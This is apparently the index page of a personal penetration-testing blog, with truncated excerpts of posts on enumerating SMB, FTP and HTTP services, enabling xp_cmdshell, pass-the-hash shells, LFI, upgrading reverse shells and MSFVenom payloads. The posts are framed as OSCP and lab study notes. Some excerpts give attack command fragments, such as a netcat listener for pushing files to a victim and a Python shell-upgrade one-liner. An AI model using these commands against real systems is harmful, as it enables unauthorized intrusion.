Cheat Sheets & Tips/Tricks

Give me six hours to chop down a tree and I will spend the first four sharpening the axe.

Abraham Lincoln

Recent Posts

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default. We’ll start by connecting to our target w/ the following command. sqsh -S <ipAddress> -U <user> -P <password> […]

Enumerating FTP for Pentesting (Port 21)

Basic Enumeration Attempt to connect anonymously by issuing the below command and specifying the following credentials; anonymous:anonymous. ftp <ipAddress> You can perform banner grabbing w/ the following Metasploit module. use auxiliary/scanner/ftp/ftp_version You can perform brute force with the following Metasploit module. use auxiliary/scanner/ftp/ftp_login Transferring Files If you have valid credentials, you can use the following […]

Dealing w/ Gobuster “WildCard” and “Status Code” Errors

Have you ever encountered the following error within Gobuster? Error: the server returns a status code that matches the provided options for non existing urls. http://ipaddress/9b9353c0-3de2-4df5-abd7-0f618e4d70ab => 200. To force processing of Wildcard responses, specify the ‘–wildcard’ switch Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, […]

Popping Remote Shells w/ winexe & pth-winexe on Windows

If you’re able to come across credentials or NTLM hashes for a Windows box that has SMB enabled, you may be able to leverage the tool called winexe to gain a shell. If you have captured a NTLM hash, say from dumping a SAM database, you may be able to pass-the-hash. Basic syntax w/ credentials. […]

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them. Uploading and Hosting Files Python Web Server The following will start a webserver in the […]

Using ps.py To Monitor Linux Processes

While working through TheCyberMentor’s Linux Privesc course, I learned something new and wanted to place this here so I can refer to it later. There’s a box on TryHackMe called ConvertMyVideo. This post does not intend to serve as a walk-through or write-up of that box, but rather is a using it as an example […]

Command Injection Tips

While working through TheCyberMentor’s Linux Privesc course, I learned something new and wanted to place this here so I can refer to it later. There’s a box on TryHackMe called ConvertMyVideo. This post does not intend to serve as a walk-through or write-up of that box, but rather is a using it as an example […]

Enumerating HTTP Ports (80, 443, 8080, etc.)

When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers. Web Application – WordPress, CMS, Drupal, etc. Web Technologies – Node.js, PHP, Java, etc. Web Server – Apache, IIS, Nginx, etc. Database – MySQL, MariaDB, […]

Setting Up BurpSuite

Once Burp loads up, there are a few things we need to configure to make our lives easier. Installing and Configuring FoxyProxy First, to make our lives easier, let’s install the Firefox add-in for FoxyProxy. With the add-in installed, let’s head into the Options. Now we can Add a new entry. Let’s create the New […]

Enumerating SMB for Pentesting (Ports 445, 139)

Using NMAP Scan for popular RCE exploits. sudo nmap -p 139,445 –script smb-vuln* <ip-addr> -oA nmap/smb-vuln Identify the SMB/OS version. nmap -v -p 139,445 –script=smb-os-discovery.nse <ip-addr> Using SMBMAP To list out the shares and associated permissions: smbmap -H <ip-addr> To list out the shares recursively: smbmap -R <sharename> -H <ip-addr> To list shares as an […]

File Transfer in Linux: Uploading & Executing in Memory

This example will show us uploading LinEnum.sh to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive. On our attacking box, find the executable you wish to transfer and run the following command: cat <filename> | nc -nvlp 9002 On the victim machine, change into the […]

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page. In this example, we’ll be using FRIENDZONE on HackTheBox. Confirming LFI on our example At the following […]

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method. In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines. We’ll do that here. There is a […]

Upgrading Simple Shells to Interactive TTYs w/ Python

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly. Once you have a reverse shell, start by running the command python -c ‘import pty;pty.spawn(“/bin/bash”)’ Now we’ll background the window with Ctrl + […]

Tmux Cheatsheet for Splitting Terminal Panes and More

Note: <PrefixKey> by default is Ctrl + B Creating Tmux Sessions and Windows tmux new -s Example Create a new tmux session titled “Example” <PrefixKey> + C Create a new window within the session <PrefixKey> + Number Take you to your different windows. Windows are identified by the banner down below. <PrefixKey> + , Rename […]

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources. Enumerating Common Services Enumerating SMB 139,445 Using smbmap and smbclient to crawl and […]

Unzipping Rockyou.txt.gz in Kali Linux

Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future. sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. Table of Contents:– Non Meterpreter Binaries– Non Meterpreter Web Payloads– Meterpreter Binaries– Meterpreter Web Payloads Non-Meterpreter Binaries Staged Payloads for Windows x86 […]


Stay Involved

Get new content delivered directly to your inbox.